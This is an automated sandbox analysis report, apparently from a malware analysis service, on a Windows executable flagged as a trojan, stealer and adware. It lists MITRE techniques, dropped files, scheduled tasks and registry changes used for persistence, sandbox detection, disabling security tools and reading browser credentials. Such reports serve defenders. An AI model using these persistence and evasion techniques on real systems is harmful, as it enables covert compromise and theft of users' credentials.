fbf5bfca398911605785389a91147f5ef8e188fe0778cb2f1808ab0f0d415c88

Analysis

max time kernel
127s
max time network
174s
platform
windows7_x64
resource
win7v20210410
submitted
21-06-2021 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3f51026069dac5d3e1b8c085ba90a0b0.exe
Size

6.3MB
MD5

3f51026069dac5d3e1b8c085ba90a0b0
SHA1

47346fe7178785b13c1455f163cb5bcd3b66909a
SHA256

fbf5bfca398911605785389a91147f5ef8e188fe0778cb2f1808ab0f0d415c88
SHA512

2d73f4ca1838475e83ce212254dcbfce2283784433782dc5828d2244aa1095a5d13cecfedfcf31c43b08bd2f7ccab2e4710c95b3b0f36a9e3bce6d8570b1d48e

Score

10^/10

adware discovery evasion persistence spyware stealer trojan

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

9 1604 rundll32.exe
Executes dropped EXE 5 IoCs

Processes:

SimplInst.exeSimplInst.exeVgXfIDg.exesOUUgCQ.exepWUFXAW.exe

pid process

1980 SimplInst.exe
1628 SimplInst.exe
832 VgXfIDg.exe
528 sOUUgCQ.exe
2028 pWUFXAW.exe

flow	pid	process
9	1604	rundll32.exe

pid	process
1980	SimplInst.exe
1628	SimplInst.exe
832	VgXfIDg.exe
528	sOUUgCQ.exe
2028	pWUFXAW.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Loads dropped DLL 13 IoCs

Processes:

3f51026069dac5d3e1b8c085ba90a0b0.exeSimplInst.exeSimplInst.exerundll32.exe

pid	process
1028	3f51026069dac5d3e1b8c085ba90a0b0.exe
1980	SimplInst.exe
1980	SimplInst.exe
1980	SimplInst.exe
1980	SimplInst.exe
1980	SimplInst.exe
1628	SimplInst.exe
1628	SimplInst.exe
1628	SimplInst.exe
1604	rundll32.exe
1604	rundll32.exe
1604	rundll32.exe
1604	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

Drops file in System32 directory 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeVgXfIDg.exepowershell.EXErundll32.exepowershell.exeSimplInst.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exe

description	ioc	process
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	VgXfIDg.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	VgXfIDg.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Program Files directory 64 IoCs

Processes:

sOUUgCQ.exe

description	ioc	process
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\mr\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\no\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\qDCCGhOyU\TlIVdVW.xml	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\gu\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\hi\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ms\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pt_PT\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\te\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\mrDIPifxyaTU2\syMBYvt.xml	sOUUgCQ.exe
File created	C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\DypSNQc.xml	sOUUgCQ.exe
File created	C:\Program Files (x86)\piLDiRqvGTKTC\cjIYCDh.dll	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\es\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\lt\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\uk\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\en_GB\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pl\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\nl\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\vi\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\mrDIPifxyaTU2\EynxYxtNuPSbG.dll	sOUUgCQ.exe
File created	C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\yftZIMt.dll	sOUUgCQ.exe
File created	C:\Program Files (x86)\piLDiRqvGTKTC\QgMUmfX.xml	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\el\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fil\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sl\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sr\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\tjjvRAW.dll	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\mO48CE.dll	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ar\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\de\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\id\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\bhBhhGC.exe	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\be\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fi\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\bn\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\he\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\it\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ko\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ml\messages.json	sOUUgCQ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	sOUUgCQ.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\lv\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fa\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\XpqoUDXlJoUn\xQFUCOd.dll	sOUUgCQ.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	sOUUgCQ.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sv\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\kYCDidaec.dll	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\icon16.ico	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ja\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\kn\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\th\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ca\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\en\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\et\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pt_BR\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ro\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\bg\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\en_US\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sw\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\hr\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pt\messages.json	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\hu\messages.json	sOUUgCQ.exe
File opened for modification	C:\Program Files (x86)\VnDWhryCSIE\files\Kernel.js	sOUUgCQ.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\background.html	sOUUgCQ.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bkckNrBYOjfprwtEPo.job	schtasks.exe
File created	C:\Windows\Tasks\lJLWniCkwZbjhapzm.job	schtasks.exe
File created	C:\Windows\Tasks\pMLebdOaFqOcGSU.job	schtasks.exe
File created	C:\Windows\Tasks\bAvepIylLlkyPpwct.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1512	schtasks.exe
828	schtasks.exe
1964	schtasks.exe
1372	schtasks.exe
1700	schtasks.exe
1280	schtasks.exe
1532	schtasks.exe
1624	schtasks.exe
300	schtasks.exe
748	schtasks.exe
524	schtasks.exe
1784	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 19 IoCs

adware spyware

Modify Registry

T1112

Processes:

sOUUgCQ.exepWUFXAW.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	sOUUgCQ.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\bhBhhGC.exe = "9999"	sOUUgCQ.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	sOUUgCQ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "bhBhhGC.exe"	sOUUgCQ.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Approved Extensions	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	sOUUgCQ.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MAIN	sOUUgCQ.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	sOUUgCQ.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{1A4355C3-1380-4565-8F0B-AE992134C31B} = 51667a6c4c1d3b1bd3495402b442020b9103ecd92874870e	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "bhBhhGC.exe"	sOUUgCQ.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	sOUUgCQ.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights	sOUUgCQ.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	pWUFXAW.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	pWUFXAW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\VnDWhryCSIE"	sOUUgCQ.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	sOUUgCQ.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	sOUUgCQ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\VnDWhryCSIE"	sOUUgCQ.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	sOUUgCQ.exe

Modifies data under HKEY_USERS 40 IoCs

Processes:

rundll32.exewscript.exesOUUgCQ.exeVgXfIDg.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\3a-52-03-3b-7d-07	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-52-03-3b-7d-07\WpadDecisionReason = "1"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	sOUUgCQ.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-52-03-3b-7d-07	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionTime = 0009de466c66d701	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	VgXfIDg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	VgXfIDg.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	sOUUgCQ.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a066732c6c66d701	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	sOUUgCQ.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000002094e42b6c66d701	VgXfIDg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecision = "0"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-52-03-3b-7d-07\WpadDecisionTime = 0009de466c66d701	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3a-52-03-3b-7d-07\WpadDecision = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadNetworkName = "Network"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	VgXfIDg.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a070011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionReason = "1"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	VgXfIDg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe

Modifies registry class 64 IoCs

Processes:

sOUUgCQ.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS\ = "0"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\VnDWhryCSIE"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\ = "BackgroundScriptEngine Class"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IQGKeKDyerbxjhpLMFJM"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	sOUUgCQ.exe
